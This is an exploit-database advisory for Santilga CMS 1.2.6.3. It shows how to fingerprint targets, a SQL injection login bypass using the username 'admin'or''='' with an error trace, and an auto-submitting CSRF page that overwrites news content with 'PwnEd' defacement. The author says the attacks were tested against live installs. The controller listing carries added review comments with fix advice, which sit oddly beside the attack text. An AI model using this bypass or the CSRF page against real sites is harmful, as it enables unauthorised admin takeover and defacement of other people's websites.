Santilga CMS 1.2.6.3 Cross Site Request Forgery / SQL Injection

2012-05-27T00:00:00
ID 1337DAY-ID-18372
Type zdt
Reporter AkaStep
Modified 2012-05-27T00:00:00

Description

Exploit for the PHP platform, category: web applications (SQL injection in the admin login, CSRF in the content-editing actions).

                                        
                                            =============================
Vulnerable software: Santilga CMS version 1.2.6.3

$ head -n 10 Admin.php|less
<?php

/**
 * DO NOT EDIT THIS FILE! IT WILL BE OVERWRITTEN BY THE GENERATOR!
 *
 * @version 1.2.6.3 - generated: 2010-11-06 14:39:32
 */
class Admin_Bean_Base extends Santilga_Bean {

    protected $_primaryKey = 'id';



Vendor: santilga.com
============================
Time to 0day it.
============================
Tested:
In the wild, against live installs.

OS: Windows Server running the XAMPP web-server bundle,
and Linux.



=============================
Vuln Desc
Precondition: magic_quotes_gpc is off (the PHP default since 5.4; with it on, the single quote in the payload is backslash-escaped before it reaches the query, and the CMS applies no escaping of its own).


This CMS is commercial and is vulnerable to SQL injection (in the admin login) and to CSRF (in the content-editing actions):

Due to insufficient sanitization of the login (username) field before it is concatenated into the MySQL query, the WHERE clause can be rewritten by the attacker.

To fingerprint a target and confirm that it really runs Santilga, request:

site.tld/admin/dashboard

The response shows the administration section (its login screen when you are not authenticated), which is enough to identify the CMS.


===================SNIP===========================
$ cat AdminLogin.php|less
<?php
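/**
 * Admin panel login / logout controller.
 *
 * Review notes (grounded in this listing and the advisory's error trace):
 *  - loginAction() hands the posted credentials to Admin_Model::autenticate().
 *    The trace shows that method interpolating the username straight into
 *    `SELECT admin.* FROM admin WHERE username= '...' AND password= '...'`,
 *    which is the SQL injection sink. The fix belongs in the model (bind both
 *    values as query parameters); nothing done in this controller can
 *    substitute for that.
 *  - The same trace shows the password compared as a 32-hex digest, i.e. an
 *    unsalted hash (looks like MD5 — confirm in the model); password_hash() /
 *    password_verify() would be the appropriate replacement.
 *  - No session-id regeneration is visible when the admin flag is set; confirm
 *    that the "session" resource does it, otherwise the login is open to
 *    session fixation. The login form also carries no anti-CSRF token.
 */
class AdminLogin_Controller extends Santilga_Controller{

    /**
     * Select the admin template and expose the current language to the view.
     */
    public function  __construct() {
        $this->view->templateName = "admin";
        parent::__construct();

        $this->lang = Santilga_Language::getInstance()->getLanguage();
        $this->view->lang = $this->lang;
        $this->view->showUploadForm = false;
    }

    /**
     * Default action: send an authenticated admin to the panel, everyone else
     * to the login form.
     */
    public function indexAction(){
        $target = $this->helpers->User->adminLoggedIn() ? "admin/about" : "adminLogin/login";
        $this->helpers->Url->redirect($target);
    }

    /**
     * Drop the admin markers from the session and return to the login form.
     *
     * Only the three admin keys are removed; the session itself is neither
     * destroyed nor re-keyed here.
     */
    public function logoutAction(){
        $session = Santilga_Resource::get("session");
        if($session->adminLoggedIn){
            unset($session->admin, $session->adminId, $session->adminLoggedIn);
        }
        $this->helpers->Url->redirect("adminLogin/login");
    }

    /**
     * Render the login form and, on POST, try to authenticate the admin.
     *
     * On success the admin record, its id and a logged-in flag are stored in
     * the session and the browser is redirected to admin/about. On failure a
     * translated error is passed to the view and the form is re-rendered.
     */
    public function loginAction(){

        $this->view->layoutFile = "loginLayout.php";

        $session = Santilga_Resource::get("session");
        $model = Admin_Model::getInstance();
        $error = array();

        if($post = $this->request->getPost()){

            // Explicit string / '' checks instead of empty(): a username or
            // password of exactly "0" is legitimate input, but empty("0") is
            // true and would wrongly trigger the "must not be empty" error.
            // is_string() also keeps array-valued fields (username[]=…) away
            // from the model.
            $hasUsername = isset($post["username"]) && is_string($post["username"]) && $post["username"] !== '';
            $hasPassword = isset($post["password"]) && is_string($post["password"]) && $post["password"] !== '';

            if($hasUsername && $hasPassword){
                // Forward only the two fields the admin query uses (the
                // advisory's trace shows `WHERE username= ... AND password= ...`)
                // rather than the whole POST body, so unrelated form fields
                // never reach the model. NOTE: this does NOT neutralise the
                // injection — the model must bind these values as parameters.
                $credentials = array(
                    'username' => $post["username"],
                    'password' => $post["password"],
                );

                $admin = $model->autenticate($credentials);
                if($admin !== null){
                    $session->admin = $admin;
                    $session->adminId = $admin->id;
                    $session->adminLoggedIn = true;
                    $this->helpers->Url->redirect("admin/about");
                }else{
                    $error[] = Santilga_Language::_("userPassMismatch", "Error:: username and/or password didn't match or you are
not admin");
                }
            }else{
                $error[] = Santilga_Language::_("userPassRequired", "Username and password must not be empty");
            }
        }

        $this->view->error = $error;
        $this->view->title = Santilga_Language::_("panelLogin", " Panel Login");
        $this->view->mainContent = $this->view->content("form", "login");
        $this->view->rightBlock = false;
    }

}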
?>
================================================================


Submitting a single quote (') as the username breaks the query and the application returns the following verbose error — note that it discloses the full SQL statement and a stack trace to the client:

27.05.12 11:22:39- Uncaught Santilga_Database_Exception, code: 1064,Message:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9''
at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9'

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] =>
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9''
at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9' ,[] => ,[] => 1064,[]




Exploiting — the WHERE clause shown above is built by string concatenation, so a quote in the username rewrites it:

site.tld/admin/


Login: admin'or''='
Password: whateveryouwant

The WHERE clause becomes `username= 'admin'or''='' AND password= '<hash of the password>'`. Because AND binds tighter than OR, this reads as `username='admin' OR (''='' AND password=...)`, so the row of the user named admin is returned regardless of the password, and you are logged in as that admin.

CSRF:

==================================================================
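<!--
  CSRF proof of concept: a victim who is logged in to the Santilga admin panel
  and loads this page has news item 33 overwritten. The request goes through
  because the edit endpoint accepts it with no anti-CSRF token (the form posts
  none) and relies only on the session cookie, which the browser attaches by
  itself.

  Differences from the original PoC: every field is a real hidden input (the
  original used a <select> and a <textarea> carrying an invalid type="hidden"
  attribute, which still render visibly), and the angle brackets in the values
  are entity-encoded so the markup is valid — the browser posts the decoded
  <h1>…</h1> strings exactly as before. The multipart/form-data enctype is kept
  from the original; presumably it matches the CMS's own edit form, which
  matters only if the endpoint inspects Content-Type — confirm against the
  target.
-->
<body onload="document.forms[0].submit()">
  <form action="http://TARGET_SITE/admin/news/edit/id-33" method="post" enctype="multipart/form-data">
    <input type="hidden" name="id" value="33" />
    <input type="hidden" name="title" value="&lt;h1&gt;PwnEd&lt;/h1&gt;" />
    <input type="hidden" name="introtext" value="&lt;h1&gt;You Have Been PwnEd&lt;/h1&gt;" />
    <input type="hidden" name="ordering" value="1" />
    <input type="hidden" name="published" value="1" />
  </form>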
===================================================================


